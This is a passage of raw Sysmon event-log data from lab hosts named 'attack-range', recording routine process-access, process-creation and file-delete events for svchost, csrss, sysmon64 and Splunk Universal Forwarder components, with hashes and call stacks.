12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017678Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017677Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017676Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E575-63C7-1F02-00000000B002}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017675Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E575-63C7-1F02-00000000B002}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017674Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.152{E5A8D418-E575-63C7-1F02-00000000B002}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017720Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.714{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=808D4EE72EB9574BBF416E524105B89C,SHA256=E675A2B850C6A9BA9EE4491CC4B750FE869E8B228A1A752760345BE5300DAC8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.514{FE4C2B44-E576-63C7-6C06-00000000AF02}64326464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.356{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E576-63C7-6C06-00000000AF02}6432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.356{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.356{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.356{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.356{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.355{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E576-63C7-6C06-00000000AF02}6432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.354{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E576-63C7-6C06-00000000AF02}6432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.355{FE4C2B44-E576-63C7-6C06-00000000AF02}6432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.346{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965ECA6B2CB9D9B30FBFB9F7ED886A45,SHA256=71526A0FBCBD076070584C06807E199CD560CA885433DF478514BE067797CA38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017719Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E576-63C7-2102-00000000B002}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017718Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017717Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017716Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017715Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017714Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017713Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017712Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017711Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017710Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017709Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E576-63C7-2102-00000000B002}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017708Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.376{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program 